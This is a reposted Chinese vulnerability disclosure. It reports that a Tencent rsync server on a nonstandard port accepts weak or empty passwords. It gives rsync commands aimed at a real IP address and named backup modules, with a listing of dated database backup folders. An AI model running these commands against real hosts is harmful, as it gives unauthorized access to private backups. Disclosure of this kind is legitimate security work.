神刀安全网

漏洞标题: 腾讯某rsync服务器存在弱口令(非常规端口)

漏洞详情

披露状态:

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我其实也不知道是什么来的,因为我也没看

详细说明:

rsync 183.60.118.219::init –port 53 pwd:

rsync 183.60.118.219::dblogbak –port 53 pwd:

rsync 183.60.118.219::dbbackup –port 53 pwd:

rsync 183.60.118.219::dumpbackup –port 53 pwd:

主要的是

rsync 183.60.118.219::dbbackup –port 53 pwd:

[email protected]:~/Desktop# rsync 183.60.118.219::dbbackup/ –port 53

drwxr-xr-x 20,480 2016/03/31 08:05:02 .

drwxr-xr-x 36,864 2016/03/24 03:00:46 20160324

drwxr-xr-x 36,864 2016/03/25 03:44:08 20160325

drwxr-xr-x 36,864 2016/03/26 03:56:24 20160326

drwxr-xr-x 36,864 2016/03/27 03:57:07 20160327

drwxr-xr-x 36,864 2016/03/28 03:58:47 20160328

drwxr-xr-x 36,864 2016/03/29 03:59:39 20160329

drwxr-xr-x 36,864 2016/03/30 03:59:40 20160330

drwxr-xr-x 36,864 2016/03/31 04:00:53 20160331

漏洞标题:  腾讯某rsync服务器存在弱口令(非常规端口)

我看了一下ip段似乎是腾讯qq空间应用的ip段。应该是给这些应该备份数据的,或者可能只是测试数据,并不清楚

rsync 183.60.118.219::dumpbackup –port 53 pwd:

这里也有很多自己看把,我都不知道怎么说,并不清楚是什么来的

漏洞证明:

rsync 183.60.118.219::init –port 53 pwd:

rsync 183.60.118.219::dblogbak –port 53 pwd:

rsync 183.60.118.219::dbbackup –port 53 pwd:

rsync 183.60.118.219::dumpbackup –port 53 pwd:

修复方案:

修改密码

版权声明:转载请注明来源 不能忍@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 腾讯某rsync服务器存在弱口令(非常规端口)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮